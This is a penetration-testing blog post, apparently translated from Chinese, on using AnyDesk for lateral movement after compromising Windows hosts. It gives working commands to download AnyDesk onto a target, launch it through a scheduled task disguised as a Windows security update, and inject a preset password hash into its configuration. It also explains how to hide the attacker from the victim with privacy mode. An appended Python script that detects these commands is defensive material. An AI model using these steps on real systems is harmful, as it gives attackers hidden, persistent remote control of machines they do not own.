Using AnyDesk remote control for lateral movement in intranet penetration
2022-06-24 00:10:00 【Gh0st1nTheShel】
**Welcome to follow my WeChat official account: 《The soul in the shell》**
AnyDesk is remote management software similar to TeamViewer, but it does not need to be installed and is small.
Use scenarios
- Host security software such as Cloud Lock (Yunsuo) or Huweishen blocks logins on 3389
- Platforms similar to Alibaba Cloud, where a login over 3389 raises an alert
- The target machine must be able to reach the Internet
Notes
- Starting AnyDesk requires desktop user permissions. For example, in an IIS middleware environment the webshell you obtain generally does not have desktop user permissions, so starting AnyDesk there will not work
- While AnyDesk is running, the desktop must not be logged off
- The connection may show a black screen. This happens when the desktop user left the remote desktop session without logging off; in that case, unless AnyDesk is started through winlogon, the screen cannot be used
Attack
Windows
Suppose we have obtained a shell on a Windows target; to make the simulation easy, this is a Cobalt Strike (cs) shell.
Some privilege escalation PowerShell scripts pop up a new cmd window, but its output does not come back through cs; it can only be operated from a remote desktop, yet we cannot RDP in directly.
So we have the target download AnyDesk with the following command:
powershell (New-Object System.Net.WebClient).DownloadFile("https://download.anydesk.com/AnyDesk.exe","C:\anydesk.exe")
It is actually better not to keep it in the root of the C: drive, because a domain user does not have sufficient permissions there; it is best to find a folder where the domain user has write permission.
You can see that the file has been downloaded (since this is a simulated environment it was placed casually; in a real environment, do not download it to the desktop).
But do not run it yet: we do not know the target's credentials, so naturally we cannot connect.
Open AnyDesk on your own computer; a window pops up.
You can see that AnyDesk does not connect over the LAN but over the Internet; once the network is disconnected it cannot be used.
So we need to know the target's ID before we can connect. We can therefore generate an AnyDesk user profile locally and upload it to the target host; this way we know both the target's AnyDesk ID and the password, since it is the one we set locally.
First, note your own ID:
- 819784857
Then set the access password.
Set whatever you like; just remember it yourself.
After applying, exit AnyDesk completely; do not choose Install when exiting.
The generated configuration files are stored in:
C:\Users\<your username>\AppData\Roaming\AnyDesk
Save these four files and upload them to the target host. After uploading, delete all the configuration files here, so that the local AnyDesk generates a new configuration.
Because AnyDesk has not yet been opened on the target host, create the AnyDesk folder yourself and copy the files in.
Extension:
These steps are not necessary; use them as needed.
You can set the user name before connecting; if it is not set, the current user name is used,
which may expose your identity.
Then run AnyDesk remotely through cs and connect to it from the attacker side.
Enter the password you just set.
Connected successfully.
If you have administrator privileges, you can enable "Disable user input" and "Enable privacy mode"; otherwise the other side can see the attacker's mouse.
Linux
If we can only obtain the target's shell from Linux, we cannot create the configuration files and copy them over as before, so we can only modify the configuration file.
To make the simulation easy, I launched an msf shell.
First we need to make the target download AnyDesk; the method is the same as before:
powershell (New-Object System.Net.WebClient).DownloadFile("https://download.anydesk.com/AnyDesk.exe","C:\anydesk.exe")
After downloading we start it. It can be run directly; if it cannot be run directly, you can use a scheduled task. To use a scheduled task, you first need to know who the current user is:
powershell "(((Get-WmiObject -Class Win32_Process -Filter 'Name=\"explorer.exe\"').GetOwner().user) -split '\n')[0]"
After confirming the user, create a scheduled task:
schtasks /Create /TN Windows_Security_Update /SC monthly /tr "C:\Users\testuser.G1TS\Desktop\anydesk.exe" /RU Administrator
Then run the scheduled task:
schtasks /run /tn Windows_Security_Update
After a few seconds AnyDesk connects to its server; then find and kill the process:
tasklist
taskkill /f /pid 2692
Then add the password to the configuration file (the password is AnyDeskGetAccess):
echo ad.anynet.pwd_hash=85352d14ed8d515103f6af88dd68db7573a37ae0f9c9d2952c3a63a8220a501c >> C:\Users\<user directory>\AppData\Roaming\AnyDesk\service.conf
echo ad.anynet.pwd_salt=cb65156829a1d5a7281bfe8f6c98734a >> C:\Users\<user directory>\AppData\Roaming\AnyDesk\service.conf
View the target's ID:
type C:\Users\<user name>\AppData\Roaming\AnyDesk\system.conf
Then have the target machine run AnyDesk and connect.
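From the defender's side, the three steps used in both the Windows and Linux procedures above (a PowerShell WebClient download of AnyDesk.exe, a scheduled task whose action is anydesk.exe, and an append to AnyDesk's service.conf setting ad.anynet.pwd_hash / pwd_salt) are each visible in process-creation command lines. The following Python script is an added detection example, not part of the original post; the command lines it scans are constructed samples, and the rule names and the PLACEHOLDER hash are my own.

```python
import re

# Constructed sample process-creation command lines (not real telemetry),
# modelled on the commands shown in the post above.
SAMPLE_CMDLINES = [
    'powershell (New-Object System.Net.WebClient).DownloadFile("https://download.anydesk.com/AnyDesk.exe","C:\\anydesk.exe")',
    'schtasks /Create /TN Windows_Security_Update /SC monthly /tr "C:\\Users\\u\\Desktop\\anydesk.exe" /RU Administrator',
    'cmd /c echo ad.anynet.pwd_hash=PLACEHOLDER >> C:\\Users\\u\\AppData\\Roaming\\AnyDesk\\service.conf',
    'notepad.exe C:\\readme.txt',
    '"C:\\Program Files\\AnyDesk\\AnyDesk.exe"',  # an installed copy alone is not flagged
]

# Each rule is (name, compiled pattern); names are hypothetical labels chosen here.
RULES = [
    ("anydesk_download_via_powershell",
     re.compile(r"DownloadFile\(.*anydesk", re.I)),
    ("anydesk_launched_by_schtask",
     re.compile(r"schtasks\s+/create.*anydesk\.exe", re.I)),
    ("anydesk_service_conf_tampering",
     re.compile(r">>.*anydesk\\service\.conf|ad\.anynet\.pwd_(hash|salt)", re.I)),
]


def classify(cmdline: str) -> list:
    """Return the names of all rules that match a single command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(cmdlines) -> list:
    """Return (index, cmdline, rule_names) for every line matching at least one rule."""
    hits = []
    for i, c in enumerate(cmdlines):
        names = classify(c)
        if names:
            hits.append((i, c, names))
    return hits


if __name__ == "__main__":
    for i, c, names in scan(SAMPLE_CMDLINES):
        print(f"[{i}] {', '.join(names)}: {c}")
```

In practice the command lines would come from Sysmon event 1 or Security event 4688 with command-line auditing enabled; the scheduled task creation is also logged independently of the command line.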